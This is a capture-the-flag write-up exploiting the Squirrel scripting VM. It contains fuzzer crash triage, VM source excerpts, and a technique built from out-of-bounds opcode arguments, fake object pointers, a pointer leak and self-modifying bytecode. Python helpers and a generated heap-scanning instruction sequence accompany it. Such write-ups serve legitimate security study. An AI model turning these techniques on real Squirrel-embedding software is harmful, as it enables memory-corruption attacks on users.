Squirrel as a Service - localo

Category: Pwn
Difficulty: Hard
Author: 0x4d5a

Description

🐿️ as a Service! Squirrel lang (ˈaɪ̯çˌhœʁnçən) is a super simple programming language. And our server will execute your squirrel scripts, either in text or binary based format. Go exploit it. To test this service, take this cool script:

class CSCG
{
    constructor()
    {
        isCool = true;
    }
    isCool = false;
}

function CSCG::IsCool()
{
    if (isCool)
    {
        print("CSCG is so cool!\n");
    }
}
local cscg = CSCG()
cscg.IsCool()

Server: nc hax1.allesctf.net 9888

Summary

Squirrel is a scripting language similar to Lua. It is aimed at video games, so it is easy to embed and to interface with. The language implements most of the features expected of a modern language and is, in my opinion, easier to read than Lua. Even though it is not that well known, it is used in quite a few projects, such as Code::Blocks and Valve's Source engine, so vulnerabilities in it could affect millions of users.
The author provided an archive containing instructions for setting up the server side.

Solution

Fuzz all the Things

I started by writing a Docker-based fuzzing setup and let it run overnight. The next day I had roughly 9k crashes. I used crashwalk to reduce them, but there were still too many for me to analyze.

[...]
---CRASH SUMMARY---
Filename: /fuzz_io/out/fuzzer1/crashes/id:000035,sig:11,src:000000,time:1272838,op:flip1,pos:1311
SHA1: 67f9873e108039bec32cbcd109119533ec15a828
Classification: UNKNOWN
Hash: 7e9e6aa05b01cb24de3471559b9e8fc4.72f09c75dfdfafd9e2f45a7422cbc2b6
Command: /app/bin/sq /fuzz_io/out/fuzzer1/crashes/id:000035,sig:11,src:000000,time:1272838,op:flip1,pos:1311
Faulting Frame:
   SQObjectPtr::operator= @ 0x00007f3c3234f4c5: in /app/lib/libsquirrel.so.0.0.0
Disassembly:
   0x00007f3c3234f4b1: mov rax,QWORD PTR [rsp+0x18]
   0x00007f3c3234f4b6: add rbp,QWORD PTR [rax]
   0x00007f3c3234f4b9: mov rax,QWORD PTR [rsp+0x10]
   0x00007f3c3234f4be: mov r13,QWORD PTR [rax]
   0x00007f3c3234f4c1: shl rbp,0x4
=> 0x00007f3c3234f4c5: test BYTE PTR [r13+rbp*1+0x3],0x8
   0x00007f3c3234f4cb: je 0x7f3c3234f54c <SQVM::Execute(SQObjectPtr&, long long, long long, SQObjectPtr&, unsigned long long, SQVM::ExecutionType)+9212>
   0x00007f3c3234f4cd: data16 lea rdi,[rip+0x2ba2b] # 0x7f3c3237af00
   0x00007f3c3234f4d5: data16 data16 call 0x7f3c322a7310 <__tls_get_addr@plt>
   0x00007f3c3234f4dd: movsxd rcx,DWORD PTR [rax]
Stack Head (6 entries):
   SQObjectPtr::operator=    @ 0x00007f3c3234f4c5: in /app/lib/libsquirrel.so.0.0.0
   SQVM::Execute             @ 0x00007f3c3234f4c5: in /app/lib/libsquirrel.so.0.0.0
   SQVM::Call                @ 0x00007f3c3234c4f6: in /app/lib/libsquirrel.so.0.0.0
   sq_call                   @ 0x00007f3c322b7100: in /app/lib/libsquirrel.so.0.0.0
   executeVm                 @ 0x0000000000402710: in /app/bin/sq
   main                      @ 0x0000000000402935: in /app/bin/sq
Registers:
rax=0x0000000001622850 rbx=0x00000000000000b4 rcx=0x000000000000221b rdx=0x0000000000406200 
rsi=0x0000000000406200 rdi=0x00007f3c3237af00 rbp=0x000000000003c2e0 rsp=0x00007ffe269cea50 
 r8=0x0000000000003beb  r9=0x0000000000000000 r10=0x0000000000000001 r11=0x0000000000000246 
r12=0x0000000000406188 r13=0x0000000001630d60 r14=0x0000000000000000 r15=0x00007f3c31cfb848 
rip=0x00007f3c3234f4c5 efl=0x0000000000010202  cs=0x0000000000000033  ss=0x000000000000002b 
 ds=0x0000000000000000  es=0x0000000000000000  fs=0x0000000000000000  gs=0x0000000000000000 
Extra Data:
   Description: Access violation
   Short description: AccessViolation (21/22)
   Explanation: The target crashed due to an access violation but there is not enough additional information available to determine exploitability.
---END SUMMARY---
(1 of 1) - Hash: 9da86ce1cc85e2b15e2b621b2a84dd65.163b841cd23f78f643155e229efb9688
---CRASH SUMMARY---
Filename: /fuzz_io/out/fuzzer1/crashes/id:000007,sig:11,src:000000,time:4951,op:flip1,pos:131
SHA1: c5a3e149c7c5a699938076ff78c95205f6b18b6d
Classification: EXPLOITABLE
Hash: 9da86ce1cc85e2b15e2b621b2a84dd65.163b841cd23f78f643155e229efb9688
Command: /app/bin/sq /fuzz_io/out/fuzzer1/crashes/id:000007,sig:11,src:000000,time:4951,op:flip1,pos:131
Faulting Frame:
   SQClosure::Create @ 0x00007fa85565b295: in /app/lib/libsquirrel.so.0.0.0
Disassembly:
   0x00007fa85565b282: add dl,0x1
   0x00007fa85565b285: adc dl,0x0
   0x00007fa85565b288: mov BYTE PTR [rsi+rcx*1],dl
   0x00007fa85565b28b: mov DWORD PTR [rax],0x23c9
   0x00007fa85565b291: mov rax,QWORD PTR [r13+0x58]
=> 0x00007fa85565b295: mov DWORD PTR [rax+rbx*1-0x8],0x1000001
   0x00007fa85565b29d: mov QWORD PTR [rax+rbx*1],0x0
   0x00007fa85565b2a5: inc r15
   0x00007fa85565b2a8: add rbx,0x10
   0x00007fa85565b2ac: cmp r15,QWORD PTR [r14+0xc8]
Stack Head (6 entries):
   SQClosure::Create         @ 0x00007fa85565b295: in /app/lib/libsquirrel.so.0.0.0
   SQClosure::Load           @ 0x00007fa8556b947a: in /app/lib/libsquirrel.so.0.0.0
   sq_readclosure            @ 0x00007fa855655b1f: in /app/lib/libsquirrel.so.0.0.0
   sqstd_loadfile            @ 0x00007fa855732866: in /app/lib/libsqstdlib.so.0.0.0
   executeVm                 @ 0x000000000040267a: in /app/bin/sq
   main                      @ 0x0000000000402935: in /app/bin/sq
Registers:
rax=0x0000000001ed9d40 rbx=0x000000000001a2c8 rcx=0x000000000000645a rdx=0x0000000000000046 
rsi=0x0000000000406200 rdi=0x00007fa855717f00 rbp=0x0000000001ed29e0 rsp=0x00007ffcd1165420 
 r8=0x0000000001ed9ce0  r9=0x0000000001ed9a60 r10=0x00007fa855639f59 r11=0x00007fa855626be0 
r12=0x0000000000406188 r13=0x0000000001ed9ce0 r14=0x0000000001ed92f0 r15=0x0000000000001a2c 
rip=0x00007fa85565b295 efl=0x0000000000010202  cs=0x0000000000000033  ss=0x000000000000002b 
 ds=0x0000000000000000  es=0x0000000000000000  fs=0x0000000000000000  gs=0x0000000000000000 
Extra Data:
   Description: Access violation on destination operand
   Short description: DestAv (8/22)
   Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
---END SUMMARY---
(1 of 1) - Hash: ec69f912f58555510ae8ffd8bf4d4ea9.ec69f912f58555510ae8ffd8bf4d4ea9
---CRASH SUMMARY---
Filename: /fuzz_io/out/fuzzer1/crashes/id:000031,sig:11,src:000000,time:898403,op:flip1,pos:871
SHA1: 096287872aab8e4c4315c59ed7a1218faa57b72c
Classification: UNKNOWN
Hash: ec69f912f58555510ae8ffd8bf4d4ea9.ec69f912f58555510ae8ffd8bf4d4ea9
Command: /app/bin/sq /fuzz_io/out/fuzzer1/crashes/id:000031,sig:11,src:000000,time:898403,op:flip1,pos:871
Faulting Frame:
   SQVM::Execute @ 0x00007f724bca3300: in /app/lib/libsquirrel.so.0.0.0
Disassembly:
   0x00007f724bca32ec: mov QWORD PTR [rsp+0x8],rax
   0x00007f724bca32f1: movsxd r15,DWORD PTR [rax]
   0x00007f724bca32f4: add r15,r14
   0x00007f724bca32f7: shl r15,0x4
   0x00007f724bca32fb: mov QWORD PTR [rsp+0x30],rcx
=> 0x00007f724bca3300: mov ecx,DWORD PTR [rcx+r15*1]
   0x00007f724bca3304: mov eax,ecx
   0x00007f724bca3306: or eax,r13d
   0x00007f724bca3309: cdqe
   0x00007f724bca330b: cmp rax,0x5000006
Stack Head (5 entries):
   SQVM::Execute             @ 0x00007f724bca3300: in /app/lib/libsquirrel.so.0.0.0
   SQVM::Call                @ 0x00007f724bc9e4f6: in /app/lib/libsquirrel.so.0.0.0
   sq_call                   @ 0x00007f724bc09100: in /app/lib/libsquirrel.so.0.0.0
   executeVm                 @ 0x0000000000402710: in /app/bin/sq
   main                      @ 0x0000000000402935: in /app/bin/sq
Registers:
rax=0x0000000001dba4e0 rbx=0x0000000000000035 rcx=0x0000000001dad980 rdx=0x0000000000406200 
rsi=0x0000000000406200 rdi=0x00007f724bcccf00 rbp=0x0000000000000070 rsp=0x00007ffee91de630 
 r8=0x0000000000000009  r9=0x0000000000000001 r10=0x00007f724bbf1fe1 r11=0x00007f724bc97c20 
r12=0x0000000000406188 r13=0x0000000008000010 r14=0x0000000000000002 r15=0x0000000000080080 
rip=0x00007f724bca3300 efl=0x0000000000010202  cs=0x0000000000000033  ss=0x000000000000002b 
 ds=0x0000000000000000  es=0x0000000000000000  fs=0x0000000000000000  gs=0x0000000000000000 
Extra Data:
   Description: Access violation on source operand
   Short description: SourceAv (19/22)
   Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation.
---END SUMMARY---
(1 of 1) - Hash: 8b6f67aba69bfd716aa02e94a3297c23.08f6280a7bcba65193f9eb4d56f938d3
---CRASH SUMMARY---
Filename: /fuzz_io/out/fuzzer1/crashes/id:000032,sig:11,src:000000,time:926722,op:flip1,pos:1010
SHA1: a16b39df97c4a8d2d0fba70b265d34612359c66a
Classification: UNKNOWN
Hash: 8b6f67aba69bfd716aa02e94a3297c23.08f6280a7bcba65193f9eb4d56f938d3
Command: /app/bin/sq /fuzz_io/out/fuzzer1/crashes/id:000032,sig:11,src:000000,time:926722,op:flip1,pos:1010
Faulting Frame:
   SQVM::NewSlot @ 0x00007f25e839dbfb: in /app/lib/libsquirrel.so.0.0.0
Disassembly:
   0x00007f25e839dbe9: mov bl,BYTE PTR [rdx+rcx*1]
   0x00007f25e839dbec: add bl,0x1
   0x00007f25e839dbef: adc bl,0x0
   0x00007f25e839dbf2: mov BYTE PTR [rdx+rcx*1],bl
   0x00007f25e839dbf5: mov DWORD PTR [rax],0x181a
=> 0x00007f25e839dbfb: mov eax,DWORD PTR [r12]
   0x00007f25e839dbff: cmp eax,0x8004000
   0x00007f25e839dc04: je 0x7f25e839f08d <SQVM::NewSlot(SQObjectPtr const&, SQObjectPtr const&, SQObjectPtr const&, bool)+5437>
   0x00007f25e839dc0a: cmp eax,0xa008000
   0x00007f25e839dc0f: je 0x7f25e839e788 <SQVM::NewSlot(SQObjectPtr const&, SQObjectPtr const&, SQObjectPtr const&, bool)+3128>
Stack Head (6 entries):
   SQVM::NewSlot             @ 0x00007f25e839dbfb: in /app/lib/libsquirrel.so.0.0.0
   SQVM::Execute             @ 0x00007f25e8392977: in /app/lib/libsquirrel.so.0.0.0
   SQVM::Call                @ 0x00007f25e838f4f6: in /app/lib/libsquirrel.so.0.0.0
   sq_call                   @ 0x00007f25e82fa100: in /app/lib/libsquirrel.so.0.0.0
   executeVm                 @ 0x0000000000402710: in /app/bin/sq
   main                      @ 0x0000000000402935: in /app/bin/sq
Registers:
rax=0x00007f25e7d86800 rbx=0x0000000000000001 rcx=0x0000000000007ca8 rdx=0x0000000000406200 
rsi=0x00000000113c89b0 rdi=0x00007f25e83bdf00 rbp=0x0000000000000000 rsp=0x00007ffd55ff4990 
 r8=0x0000000000000000  r9=0x00000000013d5220 r10=0x00000000013ae010 r11=0x00007f25e82ccbe0 
r12=0x00000000113c89b0 r13=0x00000000013c8820 r14=0x0000000000406188 r15=0x00000000013c89c0 
rip=0x00007f25e839dbfb efl=0x0000000000010202  cs=0x0000000000000033  ss=0x000000000000002b 
 ds=0x0000000000000000  es=0x0000000000000000  fs=0x0000000000000000  gs=0x0000000000000000 
Extra Data:
   Description: Access violation on source operand
   Short description: SourceAv (19/22)
   Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation.
---END SUMMARY---
[...]
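With thousands of crashes, a first triage step is to bucket the summaries by classification and faulting function. The following is a minimal sketch, not the tooling I actually used. It assumes only the text layout of the crashwalk summaries shown above, and the function name triage is made up for illustration.

```python
import re
from collections import Counter

def triage(report: str) -> Counter:
    """Count crashes per (classification, faulting function)."""
    buckets = Counter()
    # Every crash sits between the CRASH SUMMARY and END SUMMARY markers.
    blocks = re.findall(r"---CRASH SUMMARY---(.*?)---END SUMMARY---", report, re.S)
    for block in blocks:
        cls = re.search(r"^Classification:\s*(\S+)", block, re.M)
        # The faulting function is the first token on the line after the header.
        frame = re.search(r"^Faulting Frame:\s*(\S+)\s*@", block, re.M)
        if cls and frame:
            buckets[(cls.group(1), frame.group(1))] += 1
    return buckets

sample = """---CRASH SUMMARY---
Classification: EXPLOITABLE
Faulting Frame:
   SQClosure::Create @ 0x00007fa85565b295: in /app/lib/libsquirrel.so.0.0.0
---END SUMMARY---
---CRASH SUMMARY---
Classification: UNKNOWN
Faulting Frame:
   SQVM::Execute @ 0x00007f724bca3300: in /app/lib/libsquirrel.so.0.0.0
---END SUMMARY---
"""

for (cls, frame), count in triage(sample).most_common():
    print(cls, frame, count)
```

Sorting the buckets by count quickly shows which functions are worth reading first.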

Target analysis

I decided to do some source code review, since I now knew that the target was full of bugs. Since the server binary has all common exploit mitigations enabled, the most interesting bugs are out-of-bounds reads/writes, use-after-frees, type confusions and logic bugs. The input can be either source code that Squirrel compiles, or precompiled code that is interpreted directly. I took a quick look at the lexer (since that would allow source-code-based exploitation), but found nothing of interest and continued to search for bugs in the VM itself. The VM implements 61 opcodes and is written in hard-to-read C++ code. The instructions, like other structures, are copied directly from the binary into memory before being parsed. Each instruction is structured like this:

typedef struct{
    int_32 _arg1;
    unsigned char op;
    unsigned char _arg0;
    unsigned char _arg2;
    unsigned char _arg3;
} SQInstruction;
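To make the layout concrete, here is a small Python sketch that packs and unpacks one 8-byte instruction with the same field order as the struct above (arg1 first, then op, arg0, arg2, arg3). The Instr tuple and the helper names are illustrative only, and little-endian byte order is an assumption that holds for the x86-64 target.

```python
import struct
from typing import NamedTuple

class Instr(NamedTuple):
    op: int
    arg0: int
    arg1: int
    arg2: int
    arg3: int

# Signed 32-bit arg1 followed by four unsigned bytes, little-endian (assumed).
FMT = "<iBBBB"

def pack_instr(ins: Instr) -> bytes:
    """Serialize an instruction in the in-memory field order."""
    return struct.pack(FMT, ins.arg1, ins.op, ins.arg0, ins.arg2, ins.arg3)

def unpack_instr(raw: bytes) -> Instr:
    """Inverse of pack_instr for exactly 8 bytes."""
    arg1, op, arg0, arg2, arg3 = struct.unpack(FMT, raw)
    return Instr(op, arg0, arg1, arg2, arg3)

example = Instr(op=1, arg0=2, arg1=-1, arg2=3, arg3=4)
print(pack_instr(example).hex())
```

Because arg1 is signed, negative indices survive the round trip, which is what makes the out-of-bounds accesses described later possible.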

The VM uses a stack, which lives on the heap. Each stack slot is an SQObjectPtr, basically a structure that contains a type ID and a pointer to an object.

typedef struct tagSQObject
{
    SQObjectType _type;     //4 bytes, padded to 8
    SQObjectValue _unVal;   //8 bytes
}SQObject;

There are 18 (+1 WIERD_TYPE) basic types. Most of them just hold a pointer, but four hold their value directly: OT_NULL, OT_INTEGER, OT_FLOAT and OT_BOOL. The types are implemented as an enum whose values carry additional information, such as whether the object is reference counted.

typedef enum tagSQObjectType {
	OT_NULL = (_RT_NULL | SQOBJECT_CANBEFALSE),
	OT_INTEGER = (_RT_INTEGER | SQOBJECT_NUMERIC | SQOBJECT_CANBEFALSE),
	OT_FLOAT = (_RT_FLOAT | SQOBJECT_NUMERIC | SQOBJECT_CANBEFALSE),
	OT_BOOL = (_RT_BOOL | SQOBJECT_CANBEFALSE),
	OT_STRING = (_RT_STRING | SQOBJECT_REF_COUNTED),
	OT_TABLE = (_RT_TABLE | SQOBJECT_REF_COUNTED | SQOBJECT_DELEGABLE),
	OT_ARRAY = (_RT_ARRAY | SQOBJECT_REF_COUNTED),
	OT_USERDATA = (_RT_USERDATA | SQOBJECT_REF_COUNTED | SQOBJECT_DELEGABLE),
	OT_CLOSURE = (_RT_CLOSURE | SQOBJECT_REF_COUNTED),
	OT_NATIVECLOSURE = (_RT_NATIVECLOSURE | SQOBJECT_REF_COUNTED),
	OT_GENERATOR = (_RT_GENERATOR | SQOBJECT_REF_COUNTED),
	OT_USERPOINTER = _RT_USERPOINTER,
	OT_THREAD = (_RT_THREAD | SQOBJECT_REF_COUNTED),
	OT_FUNCPROTO = (_RT_FUNCPROTO | SQOBJECT_REF_COUNTED), //internal usage only
	OT_CLASS = (_RT_CLASS | SQOBJECT_REF_COUNTED),
	OT_INSTANCE = (_RT_INSTANCE | SQOBJECT_REF_COUNTED | SQOBJECT_DELEGABLE),
	OT_WEAKREF = (_RT_WEAKREF | SQOBJECT_REF_COUNTED),
	OT_OUTER = (_RT_OUTER | SQOBJECT_REF_COUNTED), //internal usage only
	WIERD_TYPE = 0x00
}SQObjectType;
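The flag bits can be checked by hand. The sketch below rebuilds a few type tags in Python. The numeric constants are taken from my recollection of the upstream squirrel.h and should be treated as assumptions, although they agree with the 0x05000002 tag and the cmp eax,0xa008000 comparison that show up elsewhere in this write-up.

```python
# Flag and raw-type constants as I remember them from squirrel.h (assumed).
SQOBJECT_REF_COUNTED = 0x08000000
SQOBJECT_NUMERIC     = 0x04000000
SQOBJECT_DELEGABLE   = 0x02000000
SQOBJECT_CANBEFALSE  = 0x01000000

_RT_INTEGER  = 0x00000002
_RT_STRING   = 0x00000010
_RT_INSTANCE = 0x00008000

OT_INTEGER  = _RT_INTEGER | SQOBJECT_NUMERIC | SQOBJECT_CANBEFALSE
OT_STRING   = _RT_STRING | SQOBJECT_REF_COUNTED
OT_INSTANCE = _RT_INSTANCE | SQOBJECT_REF_COUNTED | SQOBJECT_DELEGABLE

def is_ref_counted(type_tag: int) -> bool:
    """True if the VM would touch a reference count for this tag."""
    return bool(type_tag & SQOBJECT_REF_COUNTED)

for name, tag in [("OT_INTEGER", OT_INTEGER), ("OT_STRING", OT_STRING),
                  ("OT_INSTANCE", OT_INSTANCE)]:
    print(name, hex(tag), "ref counted" if is_ref_counted(tag) else "plain value")
```

The reference-counted bit matters for exploitation: any tag with it set makes the VM dereference the value as a pointer when the object is copied.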

Everything else is implemented as a class.

Bug hunting

I found many bugs in the VM code. Some are exploitable and some are not, or at least not easily (try to exploit the type confusion in _OP_APPENDARRAY: I tried to do it using a string, but you need some leaks, and there are many easier bugs to exploit).

For my exploit I mainly used OOB bugs, since no opcode bounds-checks its arguments. Two useful opcodes are _OP_LOAD, which loads an object pointer from the literals section onto the stack, and _OP_MOVE, which copies an object pointer from one stack location to another. The literals section is quite interesting because it lives in one big chunk of memory that contains multiple sections, and therefore an OOB access into the other sections is not affected by the heap layout.

    static SQFunctionProto *Create(SQSharedState *ss,SQInteger ninstructions,
        SQInteger nliterals,SQInteger nparameters,
        SQInteger nfunctions,SQInteger noutervalues,
        SQInteger nlineinfos,SQInteger nlocalvarinfos,SQInteger ndefaultparams)
    {
        SQFunctionProto *f;
        //I compact the whole class and members in a single memory allocation
        f = (SQFunctionProto *)sq_vm_malloc(_FUNC_SIZE(ninstructions,nliterals,nparameters,nfunctions,noutervalues,nlineinfos,nlocalvarinfos,ndefaultparams));
        new (f) SQFunctionProto(ss);
        f->_ninstructions = ninstructions;
        f->_literals = (SQObjectPtr*)&f->_instructions[ninstructions];
        f->_nliterals = nliterals;
        f->_parameters = (SQObjectPtr*)&f->_literals[nliterals];
        f->_nparameters = nparameters;
        f->_functions = (SQObjectPtr*)&f->_parameters[nparameters];
        f->_nfunctions = nfunctions;
        f->_outervalues = (SQOuterVar*)&f->_functions[nfunctions];
        f->_noutervalues = noutervalues;
        f->_lineinfos = (SQLineInfo *)&f->_outervalues[noutervalues];
        f->_nlineinfos = nlineinfos;
        f->_localvarinfos = (SQLocalVarInfo *)&f->_lineinfos[nlineinfos];
        f->_nlocalvarinfos = nlocalvarinfos;
        f->_defaultparams = (SQInteger *)&f->_localvarinfos[nlocalvarinfos];
        f->_ndefaultparams = ndefaultparams;
[...]
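Since _literals starts directly after the last instruction, a negative literal index reaches back into the instruction area. The sketch below computes that index. It assumes 8-byte instructions and 16-byte SQObjectPtr entries, as described above, and that the opcode indexes _literals with its signed arg1. The function name is hypothetical.

```python
SIZEOF_INSTRUCTION = 8   # bytes per SQInstruction (see the struct above)
SIZEOF_OBJECTPTR = 16    # bytes per SQObjectPtr on a 64-bit build (assumed)

def oob_literal_index(ninstructions: int, slot: int) -> int:
    """Literal index whose entry starts at instruction slot `slot`.

    Slots are counted from the start of the instruction array, so the
    byte distance from _literals is negative for every valid slot.
    """
    delta = (slot - ninstructions) * SIZEOF_INSTRUCTION
    if delta % SIZEOF_OBJECTPTR != 0:
        raise ValueError("slot is not 16-byte aligned relative to _literals")
    return delta // SIZEOF_OBJECTPTR

# A fake 16-byte object stored in the last two of ten instruction slots:
print(oob_literal_index(10, 8))
```

With the fake object placed in the final two slots, the index is -1 regardless of how many real instructions precede it.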

Using this, "fake" object pointers can be loaded onto the stack if they are created in one of the sections in the same chunk. I decided to append 16 bytes to the instructions and then use an _OP_LOAD OOB read to load, for example, a fake native closure (an object pointing to a native function) onto the stack. I wrote a basic disassembler and an assembler for Squirrel and did some testing. It worked, but whatever I tried, there was no way around a leak. And even if I got a leak, I couldn't change my instructions at runtime. This problem was quite hard for me to overcome. I searched for other bugs and developed some strategies that would utilise heap sprays or static offsets on the heap. I should have gone with heap spraying, but for some reason I can't remember, I didn't.

I had done some Windows pwning before and was used to the tooling, so I decided to exploit it on Windows first and then back-port the exploit to Linux. This was a bad idea: I later realized that the heap offsets on Linux were static, while the Windows heap offsets were random, so I went back to my first idea.

Something something self-modifying code -> shell

I can't change my instructions at runtime. Or can I?! If I knew the offset from the stack to the instruction section, I could use a JMP instruction to jump to the stack and execute my Squirrel code there. And since every instruction is just 8 bytes, I could use OT_INTEGER objects, since I can do simple integer arithmetic on their value, which is exactly 8 bytes. The OT_INTEGER type tag interpreted as an instruction is:

0x0500000200000000: _OP_LINE arg0: 0x00 arg1: 0x05000002 arg2: 0x00 arg3: 0x00

By taking a look at the _OP_LINE implementation, it can be seen that it is like a NOP instruction if no _debughook is set, which is the case.

case _OP_LINE: 
	if (_debughook) CallDebugHook(_SC('l'),arg1); continue;
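The following sketch shows how one integer on the Squirrel stack decodes as two consecutive instructions: the type tag becomes the _OP_LINE no-op and the value becomes whatever instruction I encode into it. It assumes the 4 padding bytes after the type tag are zero, as in the decoding above, and the opcode number 0x0A is just a placeholder value for the demonstration.

```python
import struct

OT_INTEGER = 0x05000002          # type tag, see the decoding above
MASK64 = 0xFFFFFFFFFFFFFFFF

def instruction_as_integer(op, arg0, arg1, arg2, arg3):
    """Integer value whose 8 bytes equal the given instruction."""
    raw = struct.pack("<iBBBB", arg1, op, arg0, arg2, arg3)
    return struct.unpack("<q", raw)[0]

def stack_slot_bytes(value):
    """16-byte stack slot: type tag padded to 8 bytes (assumed zero), then value."""
    return struct.pack("<QQ", OT_INTEGER, value & MASK64)

def decode(raw):
    """Decode raw bytes as (arg1, op, arg0, arg2, arg3) tuples."""
    return [struct.unpack_from("<iBBBB", raw, off) for off in range(0, len(raw), 8)]

value = instruction_as_integer(op=0x0A, arg0=1, arg1=-10, arg2=0, arg3=0)
for ins in decode(stack_slot_bytes(value)):
    print(ins)
```

Every second decoded instruction is therefore under my control, and it can be changed at runtime with ordinary integer arithmetic.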

The instruction pointer will just continue to the value of the OT_INTEGER. If I now get a leak, I can change, for example, arg1 of an _OP_MOVE to read at any address I want. For the leak I use the tostring closure. It reads an SQObjectPtr from the stack and returns a different string depending on the type.

bool SQVM::ToString(const SQObjectPtr &o,SQObjectPtr &res)
{
    switch(sq_type(o)) {
    case OT_STRING:
        res = o;
        return true;
    case OT_FLOAT:
        scsprintf(_sp(sq_rsl(NUMBER_MAX_CHAR+1)),sq_rsl(NUMBER_MAX_CHAR),_SC("%g"),_float(o));
        break;
    case OT_INTEGER:
        scsprintf(_sp(sq_rsl(NUMBER_MAX_CHAR+1)),sq_rsl(NUMBER_MAX_CHAR),_PRINT_INT_FMT,_integer(o));
        break;
    case OT_BOOL:
        scsprintf(_sp(sq_rsl(6)),sq_rsl(6),_integer(o)?_SC("true"):_SC("false"));
        break;
    case OT_NULL:
        scsprintf(_sp(sq_rsl(5)),sq_rsl(5),_SC("null"));
        break;
    case OT_TABLE:
    case OT_USERDATA:
    case OT_INSTANCE:
        if(_delegable(o)->_delegate) {
            SQObjectPtr closure;
            if(_delegable(o)->GetMetaMethod(this, MT_TOSTRING, closure)) {
                Push(o);
                if(CallMetaMethod(closure,MT_TOSTRING,1,res)) {
                    if(sq_type(res) == OT_STRING)
                        return true;
                }
                else {
                    return false;
                }
            }
        }
    default:
        int a = sizeof(SQString);
        SQObjectPtr*  b = _array(o)->_values._vals;
        scsprintf(_sp(sq_rsl((sizeof(void*)*2)+NUMBER_MAX_CHAR)),sq_rsl((sizeof(void*)*2)+NUMBER_MAX_CHAR),_SC("(%s : 0x%p)"),GetTypeName(o),(void*)_rawval(o));
    }
    res = SQString::Create(_ss(this),_spval);
    return true;
}
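The default branch of ToString formats the raw value with "(%s : 0x%p)". On the exploit side the pointer has to be parsed back out of that string. Here is a minimal sketch; the name parse_leak is made up, and the regex tolerates a doubled 0x prefix because glibc's %p already prints one itself.

```python
import re

# Matches "(typename : 0x<hex>)" and also "(typename : 0x0x<hex>)".
LEAK_RE = re.compile(r"\((?P<type>\w+) : (?:0x)+(?P<ptr>[0-9a-fA-F]+)\)")

def parse_leak(text):
    """Return (type name, pointer value) or None if nothing matches."""
    match = LEAK_RE.search(text)
    if match is None:
        return None
    return match.group("type"), int(match.group("ptr"), 16)

print(parse_leak("(array : 0x0x55d0c0ffee00)"))
```

The sample string is made up for illustration and is not output captured from the target.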

The default case is quite interesting, since it will print just the raw pointer value. There is the leak. One problem remains, how do I get the instruction pointer onto the squirrel stack?! A heap scanner could be used to scan for a value on the stack to get the offset. My first idea was using _OP_MOVE with a negative arg1 to scan the heap. A basic heap scanner would look like this:

local cmp = 0x411337421337
local cmp2 = 0
for(local i = 10; i< scan_width; i+=1){
	asm{
		_OP_MOVE: arg0: stack_addr(cmp2) arg1: -i arg2:0 arg3: 0
	}
	if(cmp == cmp2){
		asm{
			_OP_JMP: arg0: 0 arg1: i-ip_offset-stack_base-literal_offset arg2: 0 arg3: 0
		}
	}
}

The code above would, in theory, scan the heap from the stack to the literals section of the function, since integers wider than 4 bytes are stored as literals. After that it would jump by that offset, but the offset needs to be adjusted depending on the stack_base, the literal location and the instruction pointer location. The loop has to be unrolled, since it is still not possible to modify the instructions at runtime. I wrote some assembly code based on that, optimized for size. After many hours of fine-tuning I came up with these instructions:

stack:
	base + 0x00: 0x411337421337

NE          a0: 1 a1:-10 a2:0x00 a3:0x00
JZ          a0: 1 a1:-10 a2:0x00 a3:0x00
NE          a0: 1 a1:-11 a2:0x00 a3:0x00
JZ          a0: 1 a1:-11 a2:0x00 a3:0x00
NE          a0: 1 a1:-12 a2:0x00 a3:0x00
JZ          a0: 1 a1:-12 a2:0x00 a3:0x00
NE          a0: 1 a1:-13 a2:0x00 a3:0x00
JZ          a0: 1 a1:-13 a2:0x00 a3:0x00
[...]
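Writing the unrolled pairs by hand is tedious, so they can be generated. The sketch below only reproduces the NE/JZ pattern of the listing above and is not my original generator. It emits the operands in hex, because the assembler shown later in the Code section parses every operand with base 16. The function and parameter names are made up.

```python
def unrolled_scan(first, last, step=1, target=1):
    """Emit one NE/JZ pair per probed offset, from -first down to -last."""
    lines = []
    for offset in range(first, last + 1, step):
        a1 = "-0x%x" % offset          # negative arg1, written in hex
        for mnemonic in ("NE", "JZ"):
            lines.append("%-11s a0: 0x%02x a1: %s a2: 0x00 a3: 0x00"
                         % (mnemonic, target, a1))
    return "\n".join(lines)

print(unrolled_scan(10, 13))
```

A larger step value gives the coarser scan discussed further down.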

The idea is to use _OP_NE instead of _OP_MOVE and _OP_CMP, since it is less code and, more importantly, _OP_MOVE copies the SQObjectPtr onto the stack first. In doing so, Squirrel increases the reference count if the SQOBJECT_REF_COUNTED bit is set, which results in many invalid dereferences and crashes the program. _OP_NE uses SQVM::IsEqual, which checks whether the types match and whether the raw values match. If not, it does some special checks for integers and floats, but it never dereferences anything and is therefore perfect.

case _OP_NE:{
    bool res;
    if(!IsEqual(STK(arg2),COND_LITERAL,res)) { SQ_THROW(); }
    TARGET = (!res)?true:false;
    } continue;

_OP_JZ just checks whether the target (STK(arg0)) is false and, if so, adds arg1 to the instruction pointer.

case _OP_JZ:
	if(IsFalse(STK(arg0))) ci->_ip+=(sarg1); continue;

And by combining those two instructions, the instruction count is reduced to 2 instructions per loop cycle.

And it can be done even better:
Instead of trying to find the exact offset, use a search step size of $x = 64$ and create that many literals. This makes it possible to scan n = 0x1000 slots in 128 instructions instead of 8192. It produces more literals, but the total is $\frac{2n}{x} \cdot 8 + x \cdot 16 = 2048$ bytes, compared to $2n \cdot 8 + 1 \cdot 16 = 65552$ bytes.
Here is the calculation for the step size:
$$f(x) = \frac{n}{x} + x$$
$$f'(x) = 1 - \frac{n}{x^2}$$
$$f'(x) \overset{!}{=} 0 \quad\Rightarrow\quad x = \pm\sqrt{n}$$
Only the positive root is meaningful, which gives $x = \sqrt{4096} = 64$.
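The numbers can be double-checked with a few lines of Python. This is just a sanity check of the arithmetic for the step size, assuming two 8-byte instructions per probe and one 16-byte literal per step. The helper name scan_cost is made up.

```python
import math

def scan_cost(n, x):
    """Return (instruction count, total bytes) for scanning n slots with step x."""
    probes = n // x
    instructions = 2 * probes            # one NE and one JZ per probe
    size = instructions * 8 + x * 16     # 8-byte instructions, 16-byte literals
    return instructions, size

n = 0x1000
# Brute-force the minimum of f(x) = n/x + x over all integer step sizes.
best_step = min(range(1, n + 1), key=lambda x: n / x + x)

print(best_step, math.isqrt(n))
print(scan_cost(n, best_step))
print(scan_cost(n, 1))
```

The brute-force minimum matches the square root obtained from the derivative.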

